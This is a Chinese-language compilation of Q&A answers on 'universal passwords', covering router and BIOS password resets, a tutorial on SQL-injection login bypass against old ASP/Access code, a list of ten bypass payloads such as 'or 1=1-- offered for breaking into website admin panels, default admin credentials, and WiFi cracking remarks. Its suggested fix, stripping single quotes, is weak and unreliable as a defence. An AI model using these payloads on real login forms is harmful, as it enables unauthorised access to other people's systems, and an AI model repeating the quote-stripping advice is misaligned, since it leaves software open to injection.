萬能密碼繞過

Ⅰ TP LINK的登陸密碼有沒有辦法繞過或者破解掉

http://jingyan..com/article/fb48e8be58a41c6e622e14c9.html

忘記了管理員密碼怎麼辦？
管理密碼（登錄密碼）是登錄路由器的憑證，就像家門上的鑰匙。如果您忘記自己路由器的管理密碼，就像丟了兜里的鑰匙，是無法進入家門的。忘記了登錄的管理員密碼，只能復位路由器，沒有超級管理員密碼之類的萬能密碼。復位路由器的方法如下：
在路由器殼體背面介面找到路由器的Reset復位鍵（部分路由器為Reset小孔），如下圖：

路由器通電狀態下，按住RESET鍵5秒以上，觀察到指示燈全亮（部分路由器為系統指示燈同時快閃）後，表示復位成功。（RESET小孔要使用回形針等尖狀物按住）。

出廠默認的管理員密碼是多少？
復位之後重新登錄，路由器要求您設置一個管理密碼，對於較老版本的路由器，會要求輸入默認的管理密碼（admin）。請確認復位成功。
默認密碼和用戶大部分都是admin

Ⅱ 華碩筆記本BIOS密碼和硬碟密碼忘記怎麼解。求解救～

忘記開機密碼，還有希望通過PE來嘗試清除密碼，進入系統；但BIOS密碼遺忘，只專能通過維修處理，屬比如更換主板。建議將電腦整機送至華碩官方售後服務中心，由專業的維修工程師進行全面檢測，並嘗試維修。

華碩官方售後服務中心可以在官網如下版塊查詢：

Ⅲ 萬能密碼 'or'='or'如何防

一般用戶在登陸時，系統會要求輸入用戶名及密碼，然後將這些數據傳輸到指定頁，進行驗證，大致的代碼如下：

Set Conn= Server.CreateObject("ADODB.Connection") '定義連接資料庫的對象
Const AccessFile="jmdcw.mdb" '資料庫地址
Conn.ConnectionString="Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Server.MapPath(AccessFile) '連接到資料庫
Conn.Open '打開資料庫
....................
name=request("name") '得到所提交的用戶名
pass=request("pass") '得到所提交來的密碼
............
Set Jmdcw=Server.CreateObject("ADODB.RecordSet") '定義操作資料庫的對象
SQL="SELECT username,userpass FROM User WHERE username='"&name&"' AND userpass='"&pass&"'" 'SQL語句
Jmdcw.Open SQL,Conn,1,1 '執行查詢
......
If Jmdcw.EOF AND Jmdcw.BOF Then '如果沒有查詢到
response.redirect "onerror.html" '顯示錯誤頁
end if
'如果正確，就繼續執行。
..........

以上就是一段簡單的用戶驗證代碼，當注入漏洞被廣泛發掘之後，類似這樣的漏洞就越來越少了，但少並不表示程序員在寫代碼時已經具備了防範意識，無意之中還是會出現這樣或那樣的漏洞。OK，書歸正傳，先來測試一下上面的代碼。輸入的用戶名是：jmdcw，密碼是：123456。（典型的弱口令密碼，哈哈），這樣SQL語句就是：

select username,userpass from user where username='jmdcw' and userpass='123456'

程序會查詢user表中是否有jmdcw用戶，並且該用戶的密碼是否為123456。如果username='jmdcw'的結果為真，userpass='123456'的結果也為真，那麼「真 And 真 」的結果就是真，驗證通過。

當然，如果用戶名和密碼其中之一的結果為假，「真 And 假 」的結果就是假，當然「 假 And 假 」的結果也是假，呵呵。

沒有用戶名或密碼怎麼進入？試一下'or''='吧，在提交用戶名處輸入 jmdcw'or''='，這樣的SQL語句就是

select username,userpass from user where username='jmdcw'or''='' and userpass='12345678'

在邏輯表達式中，AND的優先順序要高於OR，所以語句會先對 「''='' and userpass='12345678'」 進行判斷，雖然 ''='' 為真，但密碼為假，所以結果為假，但因為我們加入了OR連接符，這樣，雖然後面的結果為假，但username的結果為真，所以也一樣能進入這個用戶的後台。

但如果不知道用戶的名稱，那麼就要在輸入的密碼後也加入一個'or''='，這樣，SQL語句就是

select username,userpass from user where username='jmdcw11'or''='' and userpass='12345678'or''=''

在執行and語句，''='' and userpass='12345678'的結果為假，然後是 'jmdcw11'or假 ，結果為假，再接下來是：假or ''=''，這個結果就是真了。

但現在的密碼都用MD5加密，對提交來的密碼在進入SQL語句之前，先用MD5進行了轉換，這樣，就算在密碼後加入了'or''='，也發揮不了作用。對於密碼採用md5加密的，不妨在用戶名處再加入一個or''=''，也 就是在用戶名處輸入：jmdcw'or''=''or''='，這樣的SQL 語句就是：

select username,userpass from user where username='jmdcw11'or''=''or''='' and userpass='12345678'

先執行and語句，結果為假，然後是username='jmdcw11'or''=''，結果為真，接下來是：真or假，結果還是真，這樣又繞過了驗證。

說到這兒，我忽然想起，在文章開頭所提到的網站，其密碼也是用md5加密的，並且我也不知道任何一個用戶名，也只用了一個or語句，為什麼卻進入了呢？思來思去，莫不是SQL語句中的用戶與密碼的位置有所不同，其的SQL語句是這樣的：

select username,userpass from user where WHERE userpass='"&pass&"'" and username='"&name&"'，

密碼在前面，用戶在後面，這樣，當我在用戶名處輸入：jm'or''='後，其語句就變成了

select username,userpass from user where WHERE userpass='123456" and username='jm'or''=''

按照優先順序，先運算ANd語句，結果為假，然後是OR語句，假or''=''，結果就是真了。看來代碼中的位置發生變化也能演繹成一種漏洞。

上面所提到的方法主要是針對於ACCESS資料庫，但如果程序所對應的資料庫是SQL，那危害就大很了，先不要說別的，還是說一下登陸的事情，直接用：

存在的用戶名';--

這個可以不用密碼就登陸到指定的用戶之中,如果不知道呢:就用:

任意名稱'or''='';--

這樣所進入的會是第一個用戶,很有可能是管理員的用戶之中.

如何防止這種漏洞呢？很簡單，就是在接收字元的語句中加入replace過濾語句，比如name就是：

name=replace(request("name"),"'","")

將'過濾為空。密碼過濾的方法也類似。當然，這是簡單的過濾方法，還有更多復雜的。比如過濾一些特殊字元，空格、chr(0)、%、script等一些字元，防止寫入XSS代碼。

Ⅳ 尋求破解網站後台最新萬能密碼

網站後台萬能密碼就是在用戶名與密碼處都寫入下列字元,如果知道管理員帳號的話直接添帳號,效果會更好!

例如我們要利用第一條就是:

用戶名:"or "a"="a

密碼:"or "a"="a

*********************************************************

1："or "a"="a
2： '.).or.('.a.'='.a
3：or 1=1--
4：'or 1=1--
5：a'or' 1=1--
6："or 1=1--
7：'or.'a.'='a
8："or"="a'='a
9：'or''='
10：'or'='or'

原理都是利用SQL語法來利用注入,其實這也是注入的一種,都是因為提交字元未加過濾或過濾不嚴而導致的.

其實萬能是沒有的,默認是很多的,
admin
admin

admin
admin888

少數ASP網頁後面登陸時可以用密碼1'or'1'='1(用戶名用admin等試)登陸成功。這一般也是SQL注入的第一課，原理涉及到SQL語句……驗證登陸時，如果密碼=輸入的密碼，那麼登陸成功，把1' or '1'='1帶入即「如果密碼=1或者1=1那麼登成功」由於1=1恆成立，且「密碼=1」與「1=1」是邏輯或的關系，則整句為TRUE，即登陸成功。這樣說懂不？

其實後台萬能登陸密碼這個稱號真的不那麼專業，或許叫做「後台驗證繞過語句」還好些，不過前者叫得普遍些。

Ⅳ 我發現我家的wifi存在嚴重的安全漏洞—別人只要用一個叫wifi萬能鑰匙的軟體就可以繞過密碼連接，

其實很簡單，
萬能鑰匙在先進目前也只能有限破解簡單數字組合密碼，
當然我也是蹭網大戶，Wifi萬能鑰匙是對智手機，電腦就O了
你只要從電腦端進入路由器(底盤下面的168、192等地址)設置無線安全密碼改成你愛記住的字母，大小寫要記住在加幾個數就好
萬能鑰匙破解不了字母
其它也沒什麼了
望能幫助你